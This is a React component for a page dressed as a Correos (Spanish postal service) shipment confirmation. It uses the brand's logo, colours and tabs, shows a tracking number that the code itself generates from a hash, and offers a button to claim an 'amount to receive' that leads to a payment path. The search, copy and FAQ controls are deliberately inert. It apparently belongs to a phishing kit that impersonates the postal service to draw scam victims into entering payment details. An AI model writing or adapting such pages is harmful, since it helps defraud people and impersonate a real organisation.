import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './CorreosEsSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { correosEsSuccessCopy as c } from '../correosEsSuccessCopy';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/correos-es-logo.png`;
const FOOTER_SRC = `${process.env.PUBLIC_URL || ''}/correos-es-footer.png`;

function formatTrackingId(pageCode) {
  const raw = String(pageCode || '').replace(/\W/g, '');
  if (!raw) return '—';
  let h = 0;
  for (let i = 0; i < raw.length; i += 1) h = (h * 33 + raw.charCodeAt(i)) >>> 0;
  const alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ';
  let out = '';
  let x = h;
  for (let i = 0; i < 11; i += 1) {
    out = alphabet[x % alphabet.length] + out;
    x = Math.floor(x / alphabet.length);
  }
  return out;
}

function CorreosEsSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'ES').toUpperCase();
  const symbol = getSymbol(getPrimaryCurrency(countryCode));
  const rawPrice = pageData?.price;
  const productPrice =
    rawPrice != null && String(rawPrice).trim() !== ''
      ? Number.parseFloat(String(rawPrice).replace(',', '.'))
      : null;
  const amountDisplay =
    productPrice != null && Number.isFinite(productPrice)
      ? `${productPrice % 1 === 0 ? String(productPrice.toFixed(0)) : String(productPrice)} ${symbol}`
      : `— ${symbol}`;

  const deliveryAddress = (pageData?.delivery_address || '').trim() || '—';
  const description = useMemo(() => {
    const p = (pageData?.product_name || '').trim();
    if (!p) return '—';
    return p.length > 64 ? `${p.slice(0, 61)}…` : p;
  }, [pageData?.product_name]);

  const trackingId = formatTrackingId(pageData?.page_code || pageCode);
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="cor-wrap">
        <p className="cor-loading">{c.loading}</p>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="cor-wrap">
      <div className="cor-yellow-bar" aria-hidden />

      <header className="cor-header">
        <div className="cor-header-inner">
          <a href="#/" className="cor-brand" onClick={(e) => e.preventDefault()}>
            <img src={LOGO_SRC} alt="Correos" className="cor-brand-img" width={75} height={45} decoding="async" />
          </a>
          <nav className="cor-tabs" aria-label="Tipo de cuenta">
            <span className="cor-tab cor-tab--on">{c.tabParticular}</span>
            <span className="cor-tab">{c.tabEmpresa}</span>
          </nav>
          <div className="cor-search">
            <input type="search" readOnly placeholder={c.searchPlaceholder} aria-label={c.searchPlaceholder} />
            <span className="cor-search-ico" aria-hidden />
          </div>
        </div>
      </header>

      <main className="cor-main">
        <div className="cor-main-inner">
          <h1 className="cor-title">{c.title}</h1>

          <section className="cor-card cor-card--tracking" aria-label="Tracking">
            <div className="cor-track-row">
              <div>
                <div className="cor-muted">{c.trackingLabel}</div>
                <div className="cor-track-id">{trackingId}</div>
              </div>
              <button type="button" className="cor-copy" onClick={(e) => e.preventDefault()}>
                <span className="cor-copy-box" aria-hidden />
                <span>{c.copy}</span>
              </button>
            </div>
          </section>

          <section className="cor-card cor-card--status">
            <h2 className="cor-h2">{c.statusTitle}</h2>
            <ul className="cor-status-list">
              <li>
                <span className="cor-status-ico" aria-hidden />
                <span>{c.statusLine1}</span>
              </li>
              <li>
                <span className="cor-status-ico cor-status-ico--yellow" aria-hidden />
                <span>{c.statusLine2}</span>
              </li>
            </ul>
            <Link to={index2Path} className="cor-cta-wrap">
              <button type="button" className="cor-cta">
                {c.cta} ({amountDisplay})
              </button>
            </Link>
          </section>

          <section className="cor-card cor-card--info">
            <h2 className="cor-h2">{c.productInfoTitle}</h2>
            <div className="cor-info-grid">
              <div className="cor-info-item">
                <div className="cor-muted">{c.deliveryAddress}</div>
                <div className="cor-strong">{deliveryAddress}</div>
              </div>
              <div className="cor-info-item">
                <div className="cor-muted">{c.characteristics}</div>
                <div className="cor-strong">{c.characteristicsValue}</div>
              </div>
              <div className="cor-info-item">
                <div className="cor-muted">{c.description}</div>
                <div className="cor-strong">{description}</div>
              </div>
              <div className="cor-info-item">
                <div className="cor-muted">{c.amountToReceive}</div>
                <div className="cor-strong">{amountDisplay}</div>
              </div>
            </div>
          </section>

          <section className="cor-help">
            <h2 className="cor-help-title">{c.helpTitle}</h2>
            <p className="cor-help-body">{c.helpBody}</p>
            <button type="button" className="cor-faqs" onClick={(e) => e.preventDefault()}>
              {c.faqs}
            </button>
          </section>
        </div>
      </main>

      <footer className="cor-footer">
        <img src={FOOTER_SRC} alt="" className="cor-footer-img" width={1024} height={124} decoding="async" />
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default CorreosEsSuccess;

